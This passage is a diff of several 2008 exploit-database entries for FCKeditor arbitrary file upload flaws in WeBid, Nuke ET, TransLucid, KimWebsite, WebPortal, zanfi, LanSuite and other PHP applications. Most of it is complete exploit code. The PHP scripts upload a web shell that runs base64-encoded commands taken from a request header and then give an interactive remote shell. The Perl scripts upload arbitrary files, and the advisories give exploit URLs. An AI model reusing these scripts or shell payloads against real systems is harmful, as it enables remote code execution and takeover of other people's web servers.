-if (!($ext = upload())) die("\n[-] Exploit failed...\n");
+if (!($ext = upload())) die("\n[-] Exploit failed...\n");
-else print "\n[-] Shell uploaded...starting it!\n";
+else print "\n[-] Shell uploaded...starting it!\n";
-
+
-while(1)
+while(1)
-{
+{
-	print "\nsas-shell# ";
+	print "\nsas-shell# ";
-	$cmd = trim(fgets(STDIN));
+	$cmd = trim(fgets(STDIN));
-	if ($cmd != "exit")
+	if ($cmd != "exit")
-	{
+	{
-		$packet = "GET {$path}starnet/media/gallery/test.php{$ext} HTTP/1.0\r\n";
+		$packet = "GET {$path}starnet/media/gallery/test.php{$ext} HTTP/1.0\r\n";
-		$packet.= "Host: {$host}\r\n";
+		$packet.= "Host: {$host}\r\n";
-		$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
+		$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
-		$packet.= "Connection: close\r\n\r\n";
+		$packet.= "Connection: close\r\n\r\n";
-		$output = http_send($host, $packet);
+		$output = http_send($host, $packet);
-		if (!preg_match("/_code_/", $output)) die("\n[-] Exploit failed...\n");
+		if (!preg_match("/_code_/", $output)) die("\n[-] Exploit failed...\n");
-		$shell  = explode("_code_", $output);
+		$shell  = explode("_code_", $output);
-		print "\n{$shell[1]}";
+		print "\n{$shell[1]}";
-	}
+	}
-	else break;
+	else break;
-}
+}
-
+
-?>
+?>
-
+
-# milw0rm.com [2008-07-04]
+# milw0rm.com [2008-07-04]
--- a/platforms/php/webapps/6344.php
+++ b/platforms/php/webapps/6344.php
@ -1,110 +1,110 @@
-<?php
+<?php
-/*
+/*
- -----------------------------------------------------------------
+ -----------------------------------------------------------------
- WeBid v0.5.4 (fckeditor) Remote Arbitrary File Upload Exploit
+ WeBid v0.5.4 (fckeditor) Remote Arbitrary File Upload Exploit
- -----------------------------------------------------------------
+ -----------------------------------------------------------------
- 
+ 
- author...: Stack
+ author...: Stack
- 
+ 
- [-] vulnerable code in /fck/editor/filemanager/browser/mcpuk/connectors/php/config.php
+ [-] vulnerable code in /fck/editor/filemanager/browser/mcpuk/connectors/php/config.php
- 
+ 
- 121. //File Area
+ 121. //File Area
- 122. $fckphp_config['ResourceAreas']['File'] =array(
+ 122. $fckphp_config['ResourceAreas']['File'] =array(
- 123.  
+ 123.  
- 124.  //Files(identified by extension) that may be uploaded to this area
+ 124.  //Files(identified by extension) that may be uploaded to this area
- 125.  'AllowedExtensions' => array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"),
+ 125.  'AllowedExtensions' => array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"),
- 
+ 
- with a default configuration of this script, an attacker might be able to upload arbitrary
+ with a default configuration of this script, an attacker might be able to upload arbitrary
- files containing malicious PHP code due to multiple file extensions isn't properly checked
+ files containing malicious PHP code due to multiple file extensions isn't properly checked
-*/
+*/
-error_reporting(0);
+error_reporting(0);
-set_time_limit(0);
+set_time_limit(0);
-ini_set("default_socket_timeout", 5);
+ini_set("default_socket_timeout", 5);
-function http_send($host, $packet)
+function http_send($host, $packet)
-{
+{
- $sock = fsockopen($host, 80);
+ $sock = fsockopen($host, 80);
- while (!$sock)
+ while (!$sock)
- {
+ {
-  print "\n[-] No response from {$host}:80 Trying again...";
+  print "\n[-] No response from {$host}:80 Trying again...";
-  $sock = fsockopen($host, 80);
+  $sock = fsockopen($host, 80);
- }
+ }
- fputs($sock, $packet);
+ fputs($sock, $packet);
- while (!feof($sock)) $resp .= fread($sock, 1024);
+ while (!feof($sock)) $resp .= fread($sock, 1024);
- fclose($sock);
+ fclose($sock);
- return $resp;
+ return $resp;
-}
+}
-function upload()
+function upload()
-{
+{
- global $host, $path;
+ global $host, $path;
- 
+ 
- $connector = "fck/editor/filemanager/browser/mcpuk/connectors/php/connector.php";
+ $connector = "fck/editor/filemanager/browser/mcpuk/connectors/php/connector.php";
- $file_ext  = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
+ $file_ext  = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
- 
+ 
- foreach ($file_ext as $ext)
+ foreach ($file_ext as $ext)
- {
+ {
-  print "\n[-] Trying to upload with .{$ext} extension...";
+  print "\n[-] Trying to upload with .{$ext} extension...";
-  
+  
-  $data  = "--12345\r\n";
+  $data  = "--12345\r\n";
-  $data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
+  $data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
-  $data .= "Content-Type: application/octet-stream\r\n\r\n";
+  $data .= "Content-Type: application/octet-stream\r\n\r\n";
-  $data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
+  $data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
-  $data .= "--12345--\r\n";
+  $data .= "--12345--\r\n";
-  
+  
-  $packet  = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
+  $packet  = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
-  $packet .= "Host: {$host}\r\n";
+  $packet .= "Host: {$host}\r\n";
-  $packet .= "Content-Length: ".strlen($data)."\r\n";
+  $packet .= "Content-Length: ".strlen($data)."\r\n";
-  $packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
+  $packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
-  $packet .= "Connection: close\r\n\r\n";
+  $packet .= "Connection: close\r\n\r\n";
-  $packet .= $data;
+  $packet .= $data;
-  
+  
-  preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
+  preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
-  
+  
-  if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
+  if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
-  
+  
-  $packet  = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
+  $packet  = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
-  $packet .= "Host: {$host}\r\n";
+  $packet .= "Host: {$host}\r\n";
-  $packet .= "Connection: close\r\n\r\n";
+  $packet .= "Connection: close\r\n\r\n";
-  $html    = http_send($host, $packet);
+  $html    = http_send($host, $packet);
-  
+  
-  if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
+  if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
-  
+  
-  sleep(1);
+  sleep(1);
- }
+ }
- 
+ 
- return false;
+ return false;
-}
+}
-print "\n+--------------------------------------------------------------------+";
+print "\n+--------------------------------------------------------------------+";
-print "\n|WeBid v0.5.4 (fckeditor) Remote Arbitrary File Upload Exploit by Stack|";
+print "\n|WeBid v0.5.4 (fckeditor) Remote Arbitrary File Upload Exploit by Stack|";
-print "\n+--------------------------------------------------------------------+\n";
+print "\n+--------------------------------------------------------------------+\n";
-if ($argc < 3)
+if ($argc < 3)
-{
+{
- print "\nUsage......: php $argv[0] host path\n";
+ print "\nUsage......: php $argv[0] host path\n";
- print "\nExample....: php $argv[0] localhost /";
+ print "\nExample....: php $argv[0] localhost /";
- print "\nExample....: php $argv[0] localhost /WeBid/\n";
+ print "\nExample....: php $argv[0] localhost /WeBid/\n";
- die();
+ die();
-}
+}
-$host = $argv[1];
+$host = $argv[1];
-$path = $argv[2];
+$path = $argv[2];
-if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
+if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
-else print "\n[-] Shell uploaded...starting it!\n";
+else print "\n[-] Shell uploaded...starting it!\n";
-define(STDIN, fopen("php://stdin", "r"));
+define(STDIN, fopen("php://stdin", "r"));
-while(1)
+while(1)
-{
+{
- print "\nStack-shell# ";
+ print "\nStack-shell# ";
- $cmd = trim(fgets(STDIN));
+ $cmd = trim(fgets(STDIN));
- if ($cmd != "exit")
+ if ($cmd != "exit")
- {
+ {
-  $packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
+  $packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
-  $packet.= "Host: {$host}\r\n";
+  $packet.= "Host: {$host}\r\n";
-  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
+  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
-  $packet.= "Connection: close\r\n\r\n";
+  $packet.= "Connection: close\r\n\r\n";
-  $html   = http_send($host, $packet);
+  $html   = http_send($host, $packet);
-  if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
+  if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
-  $shell = explode("_code_", $html);
+  $shell = explode("_code_", $html);
-  print "\n{$shell[1]}";
+  print "\n{$shell[1]}";
- }
+ }
- else break;
+ else break;
-}
+}
-?>
+?>
-
+
-# milw0rm.com [2008-09-01]
+# milw0rm.com [2008-09-01]
--- a/platforms/php/webapps/6360.txt
+++ b/platforms/php/webapps/6360.txt
@ -1,53 +1,53 @@
-########################## www.BugReport.ir #######################################
+########################## www.BugReport.ir #######################################
-#
+#
-#        AmnPardaz Security Research Team
+#        AmnPardaz Security Research Team
-#
+#
-# Title: TransLucid 1.75 (fckeditor) Remote Arbitrary File Upload
+# Title: TransLucid 1.75 (fckeditor) Remote Arbitrary File Upload
-# Vendor: www.translucidonline.com
+# Vendor: www.translucidonline.com
-# Vulnerable Version: 1.75 (prior versions also may be affected)
+# Vulnerable Version: 1.75 (prior versions also may be affected)
-# Exploitation: Remote with browser
+# Exploitation: Remote with browser
-# Exploit: Available
+# Exploit: Available
-# Impact: Medium
+# Impact: Medium
-# Fix: N/A
+# Fix: N/A
-# Original Advisory: http://www.bugreport.ir/index_51.htm
+# Original Advisory: http://www.bugreport.ir/index_51.htm
-###################################################################################
+###################################################################################
-
+
-####################
+####################
- Description:
+- Description:
-####################
+####################
-
+
-transLucid is the simple website publishing system with which anyone can create and maintain web content, in multiple languages and based on a
+transLucid is the simple website publishing system with which anyone can create and maintain web content, in multiple languages and based on a
-growing list of ready-made, professional layouts.
+growing list of ready-made, professional layouts.
-
+
-####################
+####################
- Vulnerability:
+- Vulnerability:
-####################
+####################
-
+
-+--> Fckeditor Arbitrary File Upload
+--> Fckeditor Arbitrary File Upload
-
+
-The problem is that it is possible to upload files to a location inside the web root "/userdata" via the
+The problem is that it is possible to upload files to a location inside the web root "/userdata" via the
-
+
-/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php script.
+/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php script.
-
+
-
+
-####################
+####################
- Exploit:
+- Exploit:
-####################
+####################
-
+
-http://example.com/transLucid_175/editors/FCKeditor/editor/filemanager/browser/default/connectors/test.html
+http://example.com/transLucid_175/editors/FCKeditor/editor/filemanager/browser/default/connectors/test.html
-
+
-####################
+####################
- Solution:
+- Solution:
-####################
+####################
-
+
-Restrict and grant only trusted users access to the resources.
+Restrict and grant only trusted users access to the resources.
-
+
-####################
+####################
- Credit :
+- Credit :
-####################
+####################
-AmnPardaz Security Research & Penetration Testing Group
+AmnPardaz Security Research & Penetration Testing Group
-Contact: admin[4t}bugreport{d0t]ir
+Contact: admin[4t}bugreport{d0t]ir
-WwW.BugReport.ir
+WwW.BugReport.ir
-WwW.AmnPardaz.com
+WwW.AmnPardaz.com
-
+
-# milw0rm.com [2008-09-03]
+# milw0rm.com [2008-09-03]
--- a/platforms/php/webapps/6410.txt
+++ b/platforms/php/webapps/6410.txt
@ -1,46 +1,46 @@
-########################################################################
+########################################################################
-#
+#
-#                          S4rK3VT Hacking TEAM
+#                          S4rK3VT Hacking TEAM
-#
+#
-# Title: KimWebsite (fckeditor) Remote Arbitrary File Upload
+# Title: KimWebsite (fckeditor) Remote Arbitrary File Upload
-# Vendor: http://sourceforge.net/project/showfiles.php?group_id=196819
+# Vendor: http://sourceforge.net/project/showfiles.php?group_id=196819
-# discover by : Ciph3r
+# discover by : Ciph3r
-# We Are : Ciph3r & Rake
+# We Are : Ciph3r & Rake
-# Ciph3r_blackhat@yahoo.com
+# Ciph3r_blackhat@yahoo.com
-# Impact: Medium
+# Impact: Medium
-# Fix: N/A
+# Fix: N/A
-# Expl0ters Security TEAM ==>> www.Expl0iters.ir
+# Expl0ters Security TEAM ==>> www.Expl0iters.ir
-########################################################################
+########################################################################
-
+
-####################
+####################
- Vulnerability:
+- Vulnerability:
-####################
+####################
-
+
-+--> Fckeditor Arbitrary File Upload
+--> Fckeditor Arbitrary File Upload
-
+
-The problem is that it is possible to upload files to a location inside the web root "/userdata" via the
+The problem is that it is possible to upload files to a location inside the web root "/userdata" via the
-
+
-[path]/fck/editor/filemanager/upload/php/upload.php script.
+[path]/fck/editor/filemanager/upload/php/upload.php script.
-
+
-
+
-####################
+####################
- Exploit:
+- Exploit:
-####################
+####################
-
+
-http://example.com/[path]/fck/editor/filemanager/upload/test.html
+http://example.com/[path]/fck/editor/filemanager/upload/test.html
-
+
-####################
+####################
- Solution:
+- Solution:
-####################
+####################
-
+
-Restrict and grant only trusted users access to the resources.
+Restrict and grant only trusted users access to the resources.
-
+
-####################
+####################
- GreTzZ :
+- GreTzZ :
-####################
+####################
-
+
-Iranian Hacker & Kurdish Security TEAM & My Mother
+Iranian Hacker & Kurdish Security TEAM & My Mother
-
+
-####################
+####################
-
+
-# milw0rm.com [2008-09-09]
+# milw0rm.com [2008-09-09]
--- a/platforms/php/webapps/6419.txt
+++ b/platforms/php/webapps/6419.txt
@ -1,42 +1,42 @@
-#!/usr/bin/perl
+#!/usr/bin/perl
-use strict;
+use strict;
-use warnings;
+use warnings;
-use LWP::UserAgent;
+use LWP::UserAgent;
-use HTTP::Request::Common;
+use HTTP::Request::Common;
-print <<INTRO;
+print <<INTRO;
-+++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++
-+zanfi 1.2 Arbitrary File Upload  xpl               +
+zanfi 1.2 Arbitrary File Upload  xpl               +
-+                                                   +
+                                                   +
-+Discovered by :reptil                              +
+Discovered by :reptil                              +
-+                                                   +
+                                                   +
-+                                                   +
+                                                   +
-+++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++
-# Reptil  
+# Reptil  
-INTRO
+INTRO
-print "Enter URL(ie: http://site.com): ";
+print "Enter URL(ie: http://site.com): ";
-    chomp(my $url=<STDIN>);
+    chomp(my $url=<STDIN>);
-   
+   
-print "Enter File Path(path to local file to upload): ";
+print "Enter File Path(path to local file to upload): ";
-    chomp(my $file=<STDIN>);
+    chomp(my $file=<STDIN>);
-my $ua = LWP::UserAgent->new;
+my $ua = LWP::UserAgent->new;
-my $re = $ua->request(POST $url.'/editor/filemanager/upload/php/upload.php',
+my $re = $ua->request(POST $url.'/editor/filemanager/upload/php/upload.php',
-                      Content_Type => 'form-data',
+                      Content_Type => 'form-data',
-                      Content      => [ NewFile => $file ] );
+                      Content      => [ NewFile => $file ] );
-if($re->is_success) {
+if($re->is_success) {
-    if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
+    if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
-    else { print "File Upload Is Disabled! Failed!\n"; }
+    else { print "File Upload Is Disabled! Failed!\n"; }
-} else { print "HTTP Request Failed!\n"; }
+} else { print "HTTP Request Failed!\n"; }
-exit;
+exit;
-
+
-##############################################################
+##############################################################
-##############################################################
+##############################################################
-*
+*
-*you can use this and upload files ! 
+*you can use this and upload files ! 
-*
+*
-*http://www.site.com/editor/filemanager/upload/test.html
+*http://www.site.com/editor/filemanager/upload/test.html
-*
+*
-*http://www.zanfi.nl
+*http://www.zanfi.nl
-##############################################################
+##############################################################
-##############################################################
+##############################################################
-
+
-# milw0rm.com [2008-09-10]
+# milw0rm.com [2008-09-10]
--- a/platforms/php/webapps/6448.txt
+++ b/platforms/php/webapps/6448.txt
@ -1,47 +1,47 @@
-########################################################################
+########################################################################
-#
+#
-#                                 S.W.A.T.
+#                                 S.W.A.T.
-#
+#
-# Title: WebPortal <= 0.7.4 (fckeditor) Remote Arbitrary File Upload
+# Title: WebPortal <= 0.7.4 (fckeditor) Remote Arbitrary File Upload
-#
+#
-# Vendor: http://webportal.ivanoculmine.com/download.php?mid=14
+# Vendor: http://webportal.ivanoculmine.com/download.php?mid=14
-#
+#
-# Discover by : S.W.A.T.
+# Discover by : S.W.A.T.
-#
+#
-# svvateam@yahoo.com
+# svvateam@yahoo.com
-#
+#
-# Impact: Medium
+# Impact: Medium
-#
+#
-# Fix: Disable It In The Config File ;)
+# Fix: Disable It In The Config File ;)
-#
+#
-# Site: wWw.SvvaT.IR
+# Site: wWw.SvvaT.IR
-#
+#
-########################################################################
+########################################################################
-
+
-####################
+####################
- Exploit:
+- Exploit:
-####################
+####################
-
+
-http://example.com/[path]/libraries/htmleditor/editor/filemanager/upload/test.html
+http://example.com/[path]/libraries/htmleditor/editor/filemanager/upload/test.html
-
+
-####################
+####################
- Demo:
+- Demo:
-####################
+####################
-
+
-http://demos.ivanoculmine.com/webportal/libraries/htmleditor/editor/filemanager/upload/test.html
+http://demos.ivanoculmine.com/webportal/libraries/htmleditor/editor/filemanager/upload/test.html
-
+
-####################
+####################
- Solution:
+- Solution:
-####################
+####################
-
+
-Restrict and grant only trusted users access to the resources.
+Restrict and grant only trusted users access to the resources.
-
+
-####################
+####################
- GreTzZ :
+- GreTzZ :
-####################
+####################
-
+
-All My Friend's , Str0ke
+All My Friend's , Str0ke
-
+
-####################
+####################
-
+
-# milw0rm.com [2008-09-12]
+# milw0rm.com [2008-09-12]
--- a/platforms/php/webapps/6573.pl
+++ b/platforms/php/webapps/6573.pl
@ -1,28 +1,28 @@
-#!/usr/bin/perl
+#!/usr/bin/perl
-use strict;
+use strict;
-use warnings;
+use warnings;
-use LWP::UserAgent;
+use LWP::UserAgent;
-use HTTP::Request::Common;
+use HTTP::Request::Common;
-print <<INTRO;
+print <<INTRO;
-+++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++
-+ LanSuite 3.3.2 (fckeditor) Arbitrary File Upload  +
+ LanSuite 3.3.2 (fckeditor) Arbitrary File Upload  +
-+                                                   +
+                                                   +
-+                   By: Stack                       +
+                   By: Stack                       +
-+++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++
-INTRO
+INTRO
-print "Enter URL(ie: http://site.com): ";
+print "Enter URL(ie: http://site.com): ";
-    chomp(my $url=<STDIN>);
+    chomp(my $url=<STDIN>);
-  
+  
-print "Enter File Path(path to local file to upload): ";
+print "Enter File Path(path to local file to upload): ";
-    chomp(my $file=<STDIN>);
+    chomp(my $file=<STDIN>);
-my $ua = LWP::UserAgent->new;
+my $ua = LWP::UserAgent->new;
-my $re = $ua->request(POST $url.'/FCKeditor/editor/filemanager/upload/php/upload.php',
+my $re = $ua->request(POST $url.'/FCKeditor/editor/filemanager/upload/php/upload.php',
-                      Content_Type => 'form-data',
+                      Content_Type => 'form-data',
-                      Content      => [ NewFile => $file ] );
+                      Content      => [ NewFile => $file ] );
-if($re->is_success) {
+if($re->is_success) {
-    if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
+    if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
-    else { print "File Upload Is Disabled! Failed!\n"; }
+    else { print "File Upload Is Disabled! Failed!\n"; }
-} else { print "HTTP Request Failed!\n"; }
+} else { print "HTTP Request Failed!\n"; }
-exit;
+exit;
-
+
-# milw0rm.com [2008-09-25]
+# milw0rm.com [2008-09-25]
--- a/platforms/php/webapps/6783.php
+++ b/platforms/php/webapps/6783.php
@ -1,132 +1,132 @@
-<?php
+<?php
-
+
-/*
+/*
-	---------------------------------------------------------------
+	---------------------------------------------------------------
-	Nuke ET <= 3.4 (fckeditor) Remote Arbitrary File Upload Exploit
+	Nuke ET <= 3.4 (fckeditor) Remote Arbitrary File Upload Exploit
-	---------------------------------------------------------------
+	---------------------------------------------------------------
-	
+	
-	author...: EgiX
+	author...: EgiX
-	mail.....: n0b0d13s[at]gmail[dot]com
+	mail.....: n0b0d13s[at]gmail[dot]com
-	
+	
-	link.....: http://www.truzone.org/
+	link.....: http://www.truzone.org/
-	
+	
-	This PoC was written for educational purpose. Use it at your own risk.
+	This PoC was written for educational purpose. Use it at your own risk.
-	Author will be not responsible for any damage.
+	Author will be not responsible for any damage.
-	
+	
-	[-] vulnerable code in /nuke/FCKeditor/editor/filemanager/browser/default/connectors/php/commands.php
+	[-] vulnerable code in /nuke/FCKeditor/editor/filemanager/browser/default/connectors/php/commands.php
-	
+	
-	147.	function FileUpload( $resourceType, $currentFolder )
+	147.	function FileUpload( $resourceType, $currentFolder )
-	148.	{
+	148.	{
-	149.		$sErrorNumber = '0' ;
+	149.		$sErrorNumber = '0' ;
-	150.		$sFileName = '' ;
+	150.		$sFileName = '' ;
-	151.	
+	151.	
-	152.		if ( isset( $_FILES['NewFile'] ) && !is_null( $_FILES['NewFile']['tmp_name'] ) )
+	152.		if ( isset( $_FILES['NewFile'] ) && !is_null( $_FILES['NewFile']['tmp_name'] ) )
-	153.		{
+	153.		{
-	154.			$oFile = $_FILES['NewFile'] ;
+	154.			$oFile = $_FILES['NewFile'] ;
-	155.	
+	155.	
-	156.			// Map the virtual path to the local server path.
+	156.			// Map the virtual path to the local server path.
-	157.			$sServerDir = ServerMapFolder( $resourceType, $currentFolder ) ;
+	157.			$sServerDir = ServerMapFolder( $resourceType, $currentFolder ) ;
-	158.	
+	158.	
-	159.			// Get the uploaded file name.
+	159.			// Get the uploaded file name.
-	160.			$sFileName = $oFile['name'] ;
+	160.			$sFileName = $oFile['name'] ;
-	161.			$sOriginalFileName = $sFileName ;
+	161.			$sOriginalFileName = $sFileName ;
-	162.			// Security fix by truzone 01-15-2006
+	162.			// Security fix by truzone 01-15-2006
-	163.			//$sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
+	163.			//$sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
-	164.			//$sExtension = strtolower( $sExtension ) ;
+	164.			//$sExtension = strtolower( $sExtension ) ;
-	165.	
+	165.	
-	166.			if(extension_loaded("mime_magic")){
+	166.			if(extension_loaded("mime_magic")){
-	167.			$sExtension = mime_content_type($oFile['tmp_name']);
+	167.			$sExtension = mime_content_type($oFile['tmp_name']);
-	168.			}else{
+	168.			}else{
-	169.			$sExtension = $oFile['type'];
+	169.			$sExtension = $oFile['type'];
-	170.			}
+	170.			}
-	171.			// en of security fix by truzone 01-15-2006
+	171.			// en of security fix by truzone 01-15-2006
-	172.			global $Config ;
+	172.			global $Config ;
-	173.	
+	173.	
-	174.			$arAllowed	= $Config['AllowedExtensions'][$resourceType] ;
+	174.			$arAllowed	= $Config['AllowedExtensions'][$resourceType] ;
-	175.			$arDenied	= $Config['DeniedExtensions'][$resourceType] ;
+	175.			$arDenied	= $Config['DeniedExtensions'][$resourceType] ;
-
+
-	An attacker might be able to upload arbitrary files containing malicious PHP code due to the code
+	An attacker might be able to upload arbitrary files containing malicious PHP code due to the code
-	near lines 166-170 will check only the MIME type of the upload request, that can be easily spoofed!
+	near lines 166-170 will check only the MIME type of the upload request, that can be easily spoofed!
-*/
+*/
-
+
-error_reporting(0);
+error_reporting(0);
-set_time_limit(0);
+set_time_limit(0);
-ini_set("default_socket_timeout", 5);
+ini_set("default_socket_timeout", 5);
-
+
-define(STDIN, fopen("php://stdin", "r"));
+define(STDIN, fopen("php://stdin", "r"));
-
+
-function http_send($host, $packet)
+function http_send($host, $packet)
-{
+{
-	$sock = fsockopen($host, 80);
+	$sock = fsockopen($host, 80);
-	while (!$sock)
+	while (!$sock)
-	{
+	{
-		print "\n[-] No response from {$host}:80 Trying again...";
+		print "\n[-] No response from {$host}:80 Trying again...";
-		$sock = fsockopen($host, 80);
+		$sock = fsockopen($host, 80);
-	}
+	}
-	fputs($sock, $packet);
+	fputs($sock, $packet);
-	while (!feof($sock)) $resp .= fread($sock, 1024);
+	while (!feof($sock)) $resp .= fread($sock, 1024);
-	fclose($sock);
+	fclose($sock);
-	return $resp;
+	return $resp;
-}
+}
-
+
-function connector_response($html)
+function connector_response($html)
-{
+{
-	return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
+	return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
-}
+}
-
+
-print "\n+------------------------------------------------------------------+";
+print "\n+------------------------------------------------------------------+";
-print "\n| Nuke ET <= 3.4 (fckeditor) Arbitrary File Upload Exploit by EgiX |";
+print "\n| Nuke ET <= 3.4 (fckeditor) Arbitrary File Upload Exploit by EgiX |";
-print "\n+------------------------------------------------------------------+\n";
+print "\n+------------------------------------------------------------------+\n";
-
+
-if ($argc < 3)
+if ($argc < 3)
-{
+{
-	print "\nUsage......: php $argv[0] host path";
+	print "\nUsage......: php $argv[0] host path";
-	print "\nExample....: php $argv[0] localhost /";
+	print "\nExample....: php $argv[0] localhost /";
-	print "\nExample....: php $argv[0] localhost /nukeet/\n";
+	print "\nExample....: php $argv[0] localhost /nukeet/\n";
-	die();
+	die();
-}
+}
-
+
-$host = $argv[1];
+$host = $argv[1];
-$path = ereg_replace("(/){2,}", "/", $argv[2]);
+$path = ereg_replace("(/){2,}", "/", $argv[2]);
-
+
-$filename  = md5(time()).".php";
+$filename  = md5(time()).".php";
-$connector = "FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php";
+$connector = "FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php";
-
+
-$payload  = "--o0oOo0o\r\n";
+$payload  = "--o0oOo0o\r\n";
-$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
+$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
-$payload .= "Content-Type: application/zip\r\n\r\n";
+$payload .= "Content-Type: application/zip\r\n\r\n";
-$payload .= "PK\003\004<?php error_reporting(0);print(\"_code_\\n\");passthru(base64_decode(\$_SERVER[HTTP_CMD])); ?>\n";
+$payload .= "PK\003\004<?php error_reporting(0);print(\"_code_\\n\");passthru(base64_decode(\$_SERVER[HTTP_CMD])); ?>\n";
-$payload .= "--o0oOo0o--\r\n";
+$payload .= "--o0oOo0o--\r\n";
-
+
-$packet	 = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
+$packet	 = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
-$packet	.= "Host: {$host}\r\n";
+$packet	.= "Host: {$host}\r\n";
-$packet .= "Content-Length: ".strlen($payload)."\r\n";
+$packet .= "Content-Length: ".strlen($payload)."\r\n";
-$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
+$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
-$packet .= "Connection: close\r\n\r\n";
+$packet .= "Connection: close\r\n\r\n";
-$packet .= $payload;
+$packet .= $payload;
-
+
-if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
+if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
-else print "\n[-] Shell uploaded to {$filename}...starting it!\n";
+else print "\n[-] Shell uploaded to {$filename}...starting it!\n";
-
+
-$path .= str_repeat("../", substr_count($path, "/") - 1) . "UserFiles/File/"; // come back to the document root 
+$path .= str_repeat("../", substr_count($path, "/") - 1) . "UserFiles/File/"; // come back to the document root 
-
+
-$packet  = "GET {$path}{$filename} HTTP/1.0\r\n";
+$packet  = "GET {$path}{$filename} HTTP/1.0\r\n";
-$packet .= "Host: {$host}\r\n";
+$packet .= "Host: {$host}\r\n";
-$packet .= "Cmd: %s\r\n";
+$packet .= "Cmd: %s\r\n";
-$packet .= "Connection: close\r\n\r\n";
+$packet .= "Connection: close\r\n\r\n";
-
+
-while(1)
+while(1)
-{
+{
-	print "\nnukeet-shell# ";
+	print "\nnukeet-shell# ";
-	$cmd = trim(fgets(STDIN));
+	$cmd = trim(fgets(STDIN));
-	if ($cmd != "exit")
+	if ($cmd != "exit")
-	{
+	{
-		$response = http_send($host, sprintf($packet, base64_encode($cmd)));
+		$response = http_send($host, sprintf($packet, base64_encode($cmd)));
-		preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
+		preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
-	}
+	}
-	else break;
+	else break;
-}
+}
-
+
-?>
+?>
-
+
-# milw0rm.com [2008-10-18]
+# milw0rm.com [2008-10-18]
--- a/platforms/php/webapps/7158.txt
+++ b/platforms/php/webapps/7158.txt
@ -1,51 +1,51 @@
-########################################################################
+########################################################################
-#
+#
-#                        Yellow Flood Organization
+#                        Yellow Flood Organization
-#
+#
-# Alex article-engine V1.3.0 (fckeditor) Arbitrary File Upload
+# Alex article-engine V1.3.0 (fckeditor) Arbitrary File Upload
-#
+#
-# Source: http://www.alexscriptengine.de/blog/category/article-engine/
+# Source: http://www.alexscriptengine.de/blog/category/article-engine/
-#
+#
-# Download: http://www.alexscriptengine.de/blog/asedownloads/article-engine/
